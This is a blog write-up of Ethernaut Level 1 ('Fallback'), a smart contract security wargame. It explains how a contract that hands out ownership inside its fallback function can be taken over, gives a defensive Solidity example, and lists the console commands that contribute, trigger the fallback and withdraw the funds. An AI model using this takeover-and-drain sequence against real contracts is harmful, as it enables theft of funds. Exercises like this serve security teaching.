Ethernaut — Level 1 — Fallback

Zuhaib Mohammed
2 min read · Nov 17, 2021

Ethernaut is an interactive way of learning about common security vulnerabilities in smart contracts, built by OpenZeppelin. My plan is to complete all the exercises and document my learning.

Before you start, switch MetaMask to the Rinkeby network in order to deploy the level contract, and make sure the wallet holds some test ETH.

So, let's begin!

Click here to access the source code

The task at hand is to somehow claim ownership of the contract and reduce its balance to zero. A few observations after looking at the code:

  1. The constructor sets the owner to the address deploying the contract, in our case OpenZeppelin.
  2. An “onlyOwner” modifier is declared; functions carrying this modifier can only be called by the owner of the smart contract.
  3. A function called “contribute” lets users send ETH to the contract, as long as each contribution is less than 0.001 ETH.
  4. A “withdraw” function carries the onlyOwner modifier, so only the owner can call it. It drains all the funds locked in the smart contract.
  5. Finally, a “fallback” function lets you become the owner if you have already made a contribution to the contract and you send some value along with the transaction.

Before we move further, let's understand what fallback functions are (refer to the image below). There are two main use cases for a fallback function: first, receiving ETH sent directly to the contract, and second, handling a call to a function that does not exist in the contract.

the fallback function
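To make the two entry points concrete, here is a small contract written for this post as an added example; it is not the Ethernaut level's own code. Since Solidity 0.6 the single legacy fallback has been split into receive() (plain ETH transfer, empty calldata) and fallback() (calldata that matches no function selector). The contract name FallbackDemo, the Received event and the transferOwnership function are my own choices. The important design point is that neither entry point touches authorization state: ownership only changes through an explicit onlyOwner function, which is exactly what the vulnerable level gets wrong by assigning owner inside its fallback.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example (not Ethernaut's code): a contract that accepts ETH through
// receive()/fallback() without letting either path change who the owner is.
contract FallbackDemo {
    address public owner;
    mapping(address => uint256) public contributions;

    // Emitting on every implicit entry makes unexpected transfers and
    // unknown-selector calls visible to monitoring.
    event Received(address indexed from, uint256 amount, bytes data);
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "caller is not the owner");
        _;
    }

    // Explicit contribution path, capped per call like the level's contribute().
    function contribute() public payable {
        require(msg.value > 0, "no value sent");
        require(msg.value < 0.001 ether, "contribution too large");
        contributions[msg.sender] += msg.value;
    }

    // Use case 1: plain ETH transfer with empty calldata, e.g. sendTransaction({value: 15}).
    // Only bookkeeping happens here; owner is never assigned in this path.
    receive() external payable {
        contributions[msg.sender] += msg.value;
        emit Received(msg.sender, msg.value, "");
    }

    // Use case 2: calldata whose first four bytes match no function selector.
    // Reverting is the conservative default; ETH is still accepted if sent.
    fallback() external payable {
        emit Received(msg.sender, msg.value, msg.data);
    }

    // Ownership changes only through a guarded, explicit function.
    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0), "new owner is the zero address");
        emit OwnershipTransferred(owner, newOwner);
        owner = newOwner;
    }

    function withdraw() public onlyOwner {
        payable(owner).transfer(address(this).balance);
    }
}
```

When reviewing a contract, the check is simple: read every receive() and fallback() body and confirm it does nothing beyond accepting value, logging, or reverting. Any require/assignment on owner, roles or allowlists inside those bodies deserves the same scrutiny as a public setter.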

The Solution

To complete the level, first send a small contribution by calling the “contribute” function, then trigger the fallback by sending ETH straight to the contract address rather than through a named function, as below.

await contract.contribute({value: web3.utils.toWei("0.0005", "ether")})  // must be below 0.001 ETH
await contract.sendTransaction({value: 15})                               // plain transfer hits the fallback

This invokes the fallback function and makes you the contract owner. You can now withdraw all the funds from the smart contract.

await contract.owner()     // get the current owner of the level instance (should now be your address)
await contract.withdraw()  // withdraw the funds

Hope you learnt something new today. Stay tuned for more.

Thanks for Reading!
